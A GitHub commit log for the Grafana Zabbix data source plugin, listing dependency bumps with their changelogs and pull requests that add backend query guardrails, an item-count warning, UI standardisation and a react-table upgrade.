3d631aedd75ebb563b87c06282363ce486067a87
2273 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
dependabot[bot]
|
3d631aedd7 |
Bump glob from 10.4.5 to 11.1.0 (#2153)
Bumps [glob](https://github.com/isaacs/node-glob) from 10.4.5 to 11.1.0. <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/isaacs/node-glob/blob/main/changelog.md">glob's changelog</a>.</em></p> <blockquote> <h1>changeglob</h1> <h2>13</h2> <ul> <li>Move the CLI program out to a separate package, <code>glob-bin</code>. Install that if you'd like to continue using glob from the command line.</li> </ul> <h2>12</h2> <ul> <li>Remove the unsafe <code>--shell</code> option. The <code>--shell</code> option is now ONLY supported on known shells where the behavior can be implemented safely.</li> </ul> <h2>11.1</h2> <p><a href="https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2">GHSA-5j98-mcp5-4vw2</a></p> <ul> <li>Add the <code>--shell</code> option for the command line, with a warning that this is unsafe. (It will be removed in v12.)</li> <li>Add the <code>--cmd-arg</code>/<code>-g</code> as a way to <em>safely</em> add positional arguments to the command provided to the CLI tool.</li> <li>Detect commands with space or quote characters on known shells, and pass positional arguments to them safely, avoiding <code>shell:true</code> execution.</li> </ul> <h2>11.0</h2> <ul> <li>Drop support for node before v20</li> </ul> <h2>10.4</h2> <ul> <li>Add <code>includeChildMatches: false</code> option</li> <li>Export the <code>Ignore</code> class</li> </ul> <h2>10.3</h2> <ul> <li>Add <code>--default -p</code> flag to provide a default pattern</li> <li>exclude symbolic links to directories when <code>follow</code> and <code>nodir</code> are both set</li> </ul> <h2>10.2</h2> <ul> <li>Add glob cli</li> </ul> <h2>10.1</h2> <ul> <li>Return <code>'.'</code> instead of the empty string <code>''</code> when the current working directory is returned as a match.</li> <li>Add <code>posix: true</code> option to return <code>/</code> delimited paths, even on</li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
ismail simsek
|
04fca562b0 |
feat(backend): Add query guardrails to prevent potential issues (#2149)
## Summary Implements query guardrails in the backend to prevent execution of expensive or malformed queries that could impact customer environments. Part of https://github.com/grafana/oss-big-tent-squad/issues/127 ## Changes ### New guardrails added: 1. **Item ID validation** (`queryItemIdData`) - Validates that item IDs are non-empty - Validates that item IDs contain only numeric values 2. **Time range validation** (`QueryData`) - Validates that `From` timestamp is before `To` timestamp 3. **API method allowlist** (`ZabbixAPIHandler`) - Only allows Zabbix API methods defined in the frontend type `zabbixMethodName` - Blocks any write/delete/update operations not in the allowlist ### New files: - `pkg/datasource/guardrails.go` - Validation functions and error definitions - `pkg/datasource/guardrails_test.go` - Unit tests for all validation functions ### Modified files: - `pkg/datasource/datasource.go` - Added time range validation - `pkg/datasource/zabbix.go` - Added item ID validation - `pkg/datasource/resource_handler.go` - Added API method validation ## Reasoning - Allowed functions might be unnecessary as we've already prevent using those in [types.ts](https://github.com/grafana/grafana-zabbix/blob/main/src/datasource/zabbix/types.ts#L1-L23) but it's nice to be cautious. - itemid and time validation is just for sanity. - Time range validation will be necessary in the future to warn user agains running expensive queries. |
||
|
ismail simsek
|
3e626d3aa5 |
Add item count warning in query editor for large result sets (#2152)
## Summary Adds a non-intrusive warning banner in the query editor that alerts users when their query matches a large number of items (>= 500). This helps users understand that their query may return a large amount of data and suggests using more specific filters. Part of https://github.com/grafana/oss-big-tent-squad/issues/127 ## Changes - Added `ITEM_COUNT_WARNING_THRESHOLD` constant (500 items) in `src/datasource/constants.ts` - Created new `ItemCountWarning` component in `src/datasource/components/ItemCountWarning.tsx` - Updated `MetricsQueryEditor` to track and report the count of items matching the current filter - Integrated the warning component into the main `QueryEditor` component ## How it works - When items are loaded for the dropdown in the Metrics query editor, the component counts how many items match the current item filter - If using a regex filter like `/.*/`, it applies the regex to count matching items - If the count is >= 500, a warning banner appears at the top of the query editor - The warning is purely informational - queries still execute normally - The warning only appears for the "Metrics" query type ## Screenshot The warning appears as a subtle banner with a warning icon: > I set the limit as 5 just to show the warning <img width="901" height="298" alt="grafik" src="https://github.com/user-attachments/assets/a9be8563-1b90-4581-ad15-4e7035b4166e" /> ## Why Queries that match thousands of items via wildcard filters (e.g., `/.*/`) can return massive amounts of data and potentially overload the Zabbix server. This proactive warning helps users make informed decisions about their query scope without adding friction to the normal query flow. |
||
renovate-sh-app[bot]
|
4eece4b75e |
chore(deps): update dependency terser-webpack-plugin to ^5.3.14 (#2154)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [terser-webpack-plugin](https://redirect.github.com/webpack/terser-webpack-plugin) | [`^5.3.10` → `^5.3.14`](https://renovatebot.com/diffs/npm/terser-webpack-plugin/5.3.14/5.3.16) |  |  | --- ### Release Notes <details> <summary>webpack/terser-webpack-plugin (terser-webpack-plugin)</summary> ### [`v5.3.16`](https://redirect.github.com/webpack/terser-webpack-plugin/blob/HEAD/CHANGELOG.md#5316-2025-12-11) [Compare Source](https://redirect.github.com/webpack/terser-webpack-plugin/compare/v5.3.15...v5.3.16) ### [`v5.3.15`](https://redirect.github.com/webpack/terser-webpack-plugin/blob/HEAD/CHANGELOG.md#5315-2025-12-05) [Compare Source](https://redirect.github.com/webpack/terser-webpack-plugin/compare/v5.3.14...v5.3.15) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
02a323b142 |
chore(deps): update dependency semver to ^7.7.2 (#2147)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [semver](https://redirect.github.com/npm/node-semver) | [`^7.6.3` → `^7.7.2`](https://renovatebot.com/diffs/npm/semver/7.7.2/7.7.3) |  |  | --- ### Release Notes <details> <summary>npm/node-semver (semver)</summary> ### [`v7.7.3`](https://redirect.github.com/npm/node-semver/blob/HEAD/CHANGELOG.md#773-2025-10-06) [Compare Source](https://redirect.github.com/npm/node-semver/compare/v7.7.2...v7.7.3) ##### Bug Fixes - [`e37e0ca`]( |
||
|
dependabot[bot]
|
0c1f1203ea |
Bump js-yaml from 3.14.1 to 3.14.2 (#2148)
Bumps [js-yaml](https://github.com/nodeca/js-yaml) from 3.14.1 to 3.14.2. <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md">js-yaml's changelog</a>.</em></p> <blockquote> <h2>[3.14.2] - 2025-11-15</h2> <h3>Security</h3> <ul> <li>Backported v4.1.1 fix to v3</li> </ul> <h2>[4.1.1] - 2025-11-12</h2> <h3>Security</h3> <ul> <li>Fix prototype pollution issue in yaml merge (<<) operator.</li> </ul> <h2>[4.1.0] - 2021-04-15</h2> <h3>Added</h3> <ul> <li>Types are now exported as <code>yaml.types.XXX</code>.</li> <li>Every type now has <code>options</code> property with original arguments kept as they were (see <code>yaml.types.int.options</code> as an example).</li> </ul> <h3>Changed</h3> <ul> <li><code>Schema.extend()</code> now keeps old type order in case of conflicts (e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as <code>abcd</code> instead of <code>cbad</code>).</li> </ul> <h2>[4.0.0] - 2021-01-03</h2> <h3>Changed</h3> <ul> <li>Check <a href="https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md">migration guide</a> to see details for all breaking changes.</li> <li>Breaking: "unsafe" tags <code>!!js/function</code>, <code>!!js/regexp</code>, <code>!!js/undefined</code> are moved to <a href="https://github.com/nodeca/js-yaml-js-types">js-yaml-js-types</a> package.</li> <li>Breaking: removed <code>safe*</code> functions. Use <code>load</code>, <code>loadAll</code>, <code>dump</code> instead which are all now safe by default.</li> <li><code>yaml.DEFAULT_SAFE_SCHEMA</code> and <code>yaml.DEFAULT_FULL_SCHEMA</code> are removed, use <code>yaml.DEFAULT_SCHEMA</code> instead.</li> <li><code>yaml.Schema.create(schema, tags)</code> is removed, use <code>schema.extend(tags)</code> instead.</li> <li><code>!!binary</code> now always mapped to <code>Uint8Array</code> on load.</li> <li>Reduced nesting of <code>/lib</code> folder.</li> <li>Parse numbers according to YAML 1.2 instead of YAML 1.1 (<code>01234</code> is now decimal, <code>0o1234</code> is octal, <code>1:23</code> is parsed as string instead of base60).</li> <li><code>dump()</code> no longer quotes <code>:</code>, <code>[</code>, <code>]</code>, <code>(</code>, <code>)</code> except when necessary, <a href="https://redirect.github.com/nodeca/js-yaml/issues/470">#470</a>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/557">#557</a>.</li> <li>Line and column in exceptions are now formatted as <code>(X:Y)</code> instead of <code>at line X, column Y</code> (also present in compact format), <a href="https://redirect.github.com/nodeca/js-yaml/issues/332">#332</a>.</li> <li>Code snippet created in exceptions now contains multiple lines with line numbers.</li> <li><code>dump()</code> now serializes <code>undefined</code> as <code>null</code> in collections and removes keys with <code>undefined</code> in mappings, <a href="https://redirect.github.com/nodeca/js-yaml/issues/571">#571</a>.</li> <li><code>dump()</code> with <code>skipInvalid=true</code> now serializes invalid items in collections as null.</li> <li>Custom tags starting with <code>!</code> are now dumped as <code>!tag</code> instead of <code>!<!tag></code>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/576">#576</a>.</li> <li>Custom tags starting with <code>tag:yaml.org,2002:</code> are now shorthanded using <code>!!</code>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/258">#258</a>.</li> </ul> <h3>Added</h3> <ul> <li>Added <code>.mjs</code> (es modules) support.</li> <li>Added <code>quotingType</code> and <code>forceQuotes</code> options for dumper to configure string literal style, <a href="https://redirect.github.com/nodeca/js-yaml/issues/290">#290</a>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/529">#529</a>.</li> <li>Added <code>styles: { '!!null': 'empty' }</code> option for dumper (serializes <code>{ foo: null }</code> as "<code>foo: </code>"), <a href="https://redirect.github.com/nodeca/js-yaml/issues/570">#570</a>.</li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate-sh-app[bot]
|
b7a953b178 |
chore(deps): update dependency style-loader to v3.3.4 (#2151)
This PR contains the following updates:
| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[style-loader](https://redirect.github.com/webpack-contrib/style-loader)
| [`3.3.3` →
`3.3.4`](https://renovatebot.com/diffs/npm/style-loader/3.3.3/3.3.4) |
|
|
---
### Release Notes
<details>
<summary>webpack-contrib/style-loader (style-loader)</summary>
###
[`v3.3.4`](https://redirect.github.com/webpack/style-loader/releases/tag/v3.3.4)
[Compare
Source](https://redirect.github.com/webpack-contrib/style-loader/compare/v3.3.3...v3.3.4)
#####
[3.3.4](https://redirect.github.com/webpack-contrib/style-loader/compare/v3.3.3...v3.3.4)
(2024-01-09)
##### Bug Fixes
- css experiments logic
([c12e70b](
|
||
Zoltán Bedi
|
fb046e5715 |
Chore: Migrate workflows to use create-github-app-token (#2142)
- Removes dependabot.yml as renovate will update grafana-sdk for us - Migrates to `create-github-app-token` - Pin workflows - Removes is-compatible.yml I found that workflow not helping much but creating an annoyingly long comment Fixes https://github.com/grafana/oss-big-tent-squad/issues/144 |
||
|
renovate-sh-app[bot]
|
c02767b1c3 |
chore(deps): update dependency sass-loader to v13.3.3 (#2146)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [sass-loader](https://redirect.github.com/webpack/sass-loader) | [`13.3.1` -> `13.3.3`](https://renovatebot.com/diffs/npm/sass-loader/13.3.1/13.3.3) |  |  | --- ### Release Notes <details> <summary>webpack/sass-loader (sass-loader)</summary> ### [`v13.3.3`](https://redirect.github.com/webpack/sass-loader/blob/HEAD/CHANGELOG.md#1400-2024-01-15) [Compare Source](https://redirect.github.com/webpack/sass-loader/compare/v13.3.2...v13.3.3) ##### ⚠ BREAKING CHANGES - removed `fibers` support - minimum supported Node.js version is `18.12.0` ([627f55d]( |
||
Jocelyn Collado-Kuri
|
127367464e |
Standardization across Zabbix UI components (#2141)
## Summary Throughout Zabbix we did not have a uniform UI - some drop-down were using `Select` others `Combobox` others a custom one that we created. Some had placeholders and others did not. This PR aims to standardize our Zabbix UI across our query, variable and config editors ## Detailed summary - Migrate from `Select` to `Combobox` -> `Select` component is deprecated - Migrate from `HorizontalGroup` to `Stack` -> `HorizontalGroup` is also deprecated - Remove use of "custom" dropdown `MetricPickerMenu` in favor of `Combobox` ensuring uniformity across our drop-down and removing maintenance overhead for us down the line - Standardize placeholders across all inputs <img width="630" height="243" alt="Screenshot 2025-12-17 at 1 13 45 PM" src="https://github.com/user-attachments/assets/9382057e-b443-4474-a9c8-850086d7f3d4" /> <img width="691" height="256" alt="Screenshot 2025-12-17 at 1 14 05 PM" src="https://github.com/user-attachments/assets/a05ff2af-8603-4752-8d12-337dc381c0fd" /> ## Why To have a clean and standard UI and remove use of UI deprecated packages. ## How to test - Query Editor: - By creating a new query in a dashboard or Explore and interacting with all the different query types and drop-downs - All drop-downs should be searchable and have placeholders - Config Editor: - By going to a datasource and ensuring that the dropdown for Datasource (when DB connection is enabled) and Auth type are responsive and working as expected) Fixes: https://github.com/orgs/grafana/projects/457/views/40?pane=issue&itemId=3740545830&issue=grafana%7Coss-big-tent-squad%7C139 |
||
|
Jocelyn Collado-Kuri
|
ce4a8d3e19 |
Migrate from DatasourceAPI to DatasourceWithBackend (#2123)
This PR migrates the use of `DatasourceApi` to `DatasourceWithBackend`, with this a couple additional improvements were made: 1. Migrate to use `interpolateVariablesInQuery` everywhere instead of the custom `replaceTemplateVariables` we were using 2. Moves util functions out of `datasource.ts` and into the existing `utils.ts` <img width="1261" height="406" alt="Screenshot 2025-11-20 at 11 37 56 AM" src="https://github.com/user-attachments/assets/9e396cf2-eab0-49d1-958c-963a2e896eba" /> Now we can see the `query` calls being made to the backend: <img width="367" height="102" alt="Screenshot 2025-11-20 at 11 38 18 AM" src="https://github.com/user-attachments/assets/a5a9a337-7f19-4f7c-9d04-9d30c0216fb2" /> Tested: - By running queries from Explore and Dashboards (with and without variables) - By interacting with all the different Editors to make sure `ComboBox` was working as expected Next: Once this is merged, we will next be able to slowly move away from using the `ZabbixConnector` to make backend datasource calls. Fixes: [#131](https://github.com/orgs/grafana/projects/457/views/40?pane=issue&itemId=139450234&issue=grafana%7Coss-big-tent-squad%7C131) |
||
|
ismail simsek
|
cc492b916d |
Update react-table to v8 (#2131)
Updating react-table to v8. - Migrating the existing table to v8 - Preserving the visuals and logic What's done? - Cell components are moved under `Cells` folder - Old styles for react-table-6 is removed. - Old types are removed - All logic was preserved - Some cell components are removed for simplicity Fixes: https://github.com/grafana/oss-big-tent-squad/issues/125 |
||
|
Jocelyn Collado-Kuri
|
e073382983 |
Fix always fetch Zabbix version before issuing new requests (#2133)
Previously we were only fetching the version when the version was `0`. This generally worked, but posed some problems when customers were updating their Zabbix version, specifically when upgrading from a version < `7.2.x` to `7.2.x` or above. Before `7.2.x`, an `auth` parameter was still supported when issuing a zabbix request, this was deprecated in `6.4.x` and later removed in `7.2.x`. When a user was on a version < `7.2.x` all the outgoing requests would add this `auth` parameter. When upgrading to `7.2.x` this was a problem, because the version was not `0`, hence, not requiring getting the version again, but also because we were still building the request considering an older version and adding the `auth` parameter, when this was no longer supported. This PR removes the check for `version == 0`, though this now means that every request that goes out will check the version before hand, I think this will give us a more accurate representation of the version that needs to be used. fixes https://github.com/orgs/grafana/projects/457/views/40?pane=issue&itemId=3683181283&issue=grafana%7Coss-big-tent-squad%7C135 |
||
|
ismail simsek
|
3da36ec2bb |
Chore: Convert problems to functional component (#2125)
This is a prerequisite for ugrading the react-table to v8. - No logic change is introduced. - Update DataSourceRef imports. The old import was deprecated. |
||
|
dependabot[bot]
|
360b5172cf |
Upgrade grafana-plugin-sdk-go (deps): Bump github.com/grafana/grafana-plugin-sdk-go from 0.283.0 to 0.284.0 (#2130)
Bumps [github.com/grafana/grafana-plugin-sdk-go](https://github.com/grafana/grafana-plugin-sdk-go) from 0.283.0 to 0.284.0. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/grafana/grafana-plugin-sdk-go/releases">github.com/grafana/grafana-plugin-sdk-go's releases</a>.</em></p> <blockquote> <h2>v0.284.0</h2> <h2>What's Changed</h2> <ul> <li>Vendor JSON schema to avoid network calls in tests by <a href="https://github.com/wbrowne"><code>@wbrowne</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1434">grafana/grafana-plugin-sdk-go#1434</a></li> <li>chore(deps): Update module golang.org/x/sys to v0.38.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1436">grafana/grafana-plugin-sdk-go#1436</a></li> <li>Fix: only build middleware chain once by <a href="https://github.com/njvrzm"><code>@njvrzm</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1437">grafana/grafana-plugin-sdk-go#1437</a></li> <li>chore(deps): Update GitHub Actions (major) by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1388">grafana/grafana-plugin-sdk-go#1388</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.283.0...v0.284.0">https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.283.0...v0.284.0</a></p> <h2>Compatibility</h2> <p>Note: The below are false positives. The changes are due to a change in method receiver types (<a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1437#issuecomment-3570860849">context</a>)</p> <pre><code>❯ gorelease -base v0.283.0 -version v0.284.0 <h1>github.com/grafana/grafana-plugin-sdk-go/backend</h1> <h2>incompatible changes</h2> <p>MiddlewareHandler.CallResource: removed MiddlewareHandler.CheckHealth: removed MiddlewareHandler.CollectMetrics: removed MiddlewareHandler.ConvertObjects: removed MiddlewareHandler.MutateAdmission: removed MiddlewareHandler.PublishStream: removed MiddlewareHandler.RunStream: removed MiddlewareHandler.SubscribeStream: removed MiddlewareHandler.ValidateAdmission: removed MiddlewareHandler: no longer implements AdmissionHandler</p> <h1>summary</h1> <p>v0.284.0 is a valid semantic version for this release. </code></pre></p> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate-sh-app[bot]
|
b11f2b1902 |
chore(deps): update dependency @types/node to ^20.19.16 (#2105)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@types/node](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node)) | [`^20.8.7` -> `^20.19.16`](https://renovatebot.com/diffs/npm/@types%2fnode/20.19.16/20.19.25) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xMzguNSIsInVwZGF0ZWRJblZlciI6IjQxLjEzOC41IiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6WyJ1cGRhdGUtcGF0Y2giXX0=--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
f858259eaf |
chore(deps): update dependency @babel/core to ^7.28.4 (#2126)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@babel/core](https://babel.dev/docs/en/next/babel-core) ([source](https://redirect.github.com/babel/babel/tree/HEAD/packages/babel-core)) | [`^7.21.4` -> `^7.28.4`](https://renovatebot.com/diffs/npm/@babel%2fcore/7.28.4/7.28.5) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>babel/babel (@​babel/core)</summary> ### [`v7.28.5`](https://redirect.github.com/babel/babel/blob/HEAD/CHANGELOG.md#v7285-2025-10-23) [Compare Source](https://redirect.github.com/babel/babel/compare/v7.28.4...v7.28.5) ##### 👓 Spec Compliance - `babel-parser` - [#​17446](https://redirect.github.com/babel/babel/pull/17446) Allow `Runtime Errors for Function Call Assignment Targets` ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) - `babel-helper-validator-identifier` - [#​17501](https://redirect.github.com/babel/babel/pull/17501) fix: update identifier to unicode 17 ([@​fisker](https://redirect.github.com/fisker)) ##### 🐛 Bug Fix - `babel-plugin-proposal-destructuring-private` - [#​17534](https://redirect.github.com/babel/babel/pull/17534) Allow mixing private destructuring and rest ([@​CO0Ki3](https://redirect.github.com/CO0Ki3)) - `babel-parser` - [#​17521](https://redirect.github.com/babel/babel/pull/17521) Improve `@babel/parser` error typing ([@​JLHwung](https://redirect.github.com/JLHwung)) - [#​17491](https://redirect.github.com/babel/babel/pull/17491) fix: improve ts-only declaration parsing ([@​JLHwung](https://redirect.github.com/JLHwung)) - `babel-plugin-proposal-discard-binding`, `babel-plugin-transform-destructuring` - [#​17519](https://redirect.github.com/babel/babel/pull/17519) fix: `rest` correctly returns plain array ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) - `babel-helper-create-class-features-plugin`, `babel-helper-member-expression-to-functions`, `babel-plugin-transform-block-scoping`, `babel-plugin-transform-optional-chaining`, `babel-traverse`, `babel-types` - [#​17503](https://redirect.github.com/babel/babel/pull/17503) Fix `JSXIdentifier` handling in `isReferencedIdentifier` ([@​JLHwung](https://redirect.github.com/JLHwung)) - `babel-traverse` - [#​17504](https://redirect.github.com/babel/babel/pull/17504) fix: ensure scope.push register in anonymous fn ([@​JLHwung](https://redirect.github.com/JLHwung)) ##### 🏠 Internal - `babel-types` - [#​17494](https://redirect.github.com/babel/babel/pull/17494) Type checking babel-types scripts ([@​JLHwung](https://redirect.github.com/JLHwung)) ##### :running\_woman: Performance - `babel-core` - [#​17490](https://redirect.github.com/babel/babel/pull/17490) Faster finding of locations in `buildCodeFrameError` ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi4xMi4xIiwidXBkYXRlZEluVmVyIjoiNDIuMTIuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
46a0157d70 |
fix(deps): pin dependencies (#2104)
This PR contains the following updates: | Package | Type | Update | Change | Age | Confidence | |---|---|---|---|---|---| | [@types/react](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/react) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/react)) | devDependencies | pin | [`^18.2.25` -> `18.3.24`](https://renovatebot.com/diffs/npm/@types%2freact/18.3.24/18.3.24) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [react](https://react.dev/) ([source](https://redirect.github.com/facebook/react/tree/HEAD/packages/react)) | dependencies | minor | [`18.2.0` -> `18.3.1`](https://renovatebot.com/diffs/npm/react/18.2.0/18.3.1) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [react-dom](https://react.dev/) ([source](https://redirect.github.com/facebook/react/tree/HEAD/packages/react-dom)) | dependencies | minor | [`18.2.0` -> `18.3.1`](https://renovatebot.com/diffs/npm/react-dom/18.2.0/18.3.1) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | Add the preset `:preserveSemverRanges` to your config if you don't want to pin your dependencies. --- ### Release Notes <details> <summary>facebook/react (react)</summary> ### [`v18.3.1`](https://redirect.github.com/facebook/react/blob/HEAD/CHANGELOG.md#1831-April-26-2024) [Compare Source](https://redirect.github.com/facebook/react/compare/v18.3.0...v18.3.1) - Export `act` from `react` [f1338f]( |
||
|
Jocelyn Collado-Kuri
|
89ae290942 |
Move health check to the backend (#2120)
This PR moves the health check to backend only leaving in the frontend the functionality to test the dbconnector datasource. Leaving the `dbconnector.testDataSource` should be fine since the datasource types we allow for db connection with Zabbix already are backend datasources, and so their health requests would go through the backend. Verified: Clicking test and seeing a `health` request go out. IMPORTANT: While testing this in the UI, I found a bug with the config editor - whenever a change is made in the UI and tested, the changes don't take effect (i.e. disabling trends, keeps `trends` set to `true`, enabling db connection keep `dbConnectionEnabled` set to `false` and so on.). Created a separate [issue](https://github.com/orgs/grafana/projects/457/views/40?pane=issue&itemId=3627315751&issue=grafana%7Coss-big-tent-squad%7C132) to fix this Fixes https://github.com/grafana/oss-big-tent-squad/issues/124 Fixes https://github.com/grafana/grafana-zabbix/issues/2004 |
||
|
dependabot[bot]
|
631d3bdc4f |
Upgrade grafana-plugin-sdk-go (deps): Bump github.com/grafana/grafana-plugin-sdk-go from 0.281.0 to 0.283.0 (#2124)
Bumps [github.com/grafana/grafana-plugin-sdk-go](https://github.com/grafana/grafana-plugin-sdk-go) from 0.281.0 to 0.283.0. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/grafana/grafana-plugin-sdk-go/releases">github.com/grafana/grafana-plugin-sdk-go's releases</a>.</em></p> <blockquote> <h2>v0.283.0</h2> <h2>What's Changed</h2> <ul> <li>experimental: change time-range behavior by <a href="https://github.com/gabor"><code>@gabor</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1428">grafana/grafana-plugin-sdk-go#1428</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.282.0...v0.283.0">https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.282.0...v0.283.0</a></p> <h2>Compatibility</h2> <p>We adjusted the way the experimental <code>v0alpha1.DataQuery</code> objects get serialised to JSON to be more compatible with past versions, for details see <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1428">grafana/grafana-plugin-sdk-go#1428</a></p> <pre><code>gorelease -base v0.282.0 -version v0.283.0 # summary v0.283.0 is a valid semantic version for this release. </code></pre> <h2>v0.282.0</h2> <h2>What's Changed</h2> <ul> <li>chore(deps): Update module google.golang.org/grpc to v1.76.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1423">grafana/grafana-plugin-sdk-go#1423</a></li> <li>chore(deps): Update Upstream packages by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1424">grafana/grafana-plugin-sdk-go#1424</a></li> <li>chore(deps): Update Upstream packages by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1425">grafana/grafana-plugin-sdk-go#1425</a></li> <li>experimental: conversion: improved tests by <a href="https://github.com/gabor"><code>@gabor</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1427">grafana/grafana-plugin-sdk-go#1427</a></li> <li>chore(deps): Update module github.com/grpc-ecosystem/go-grpc-middleware/v2 to v2.3.3 by <a 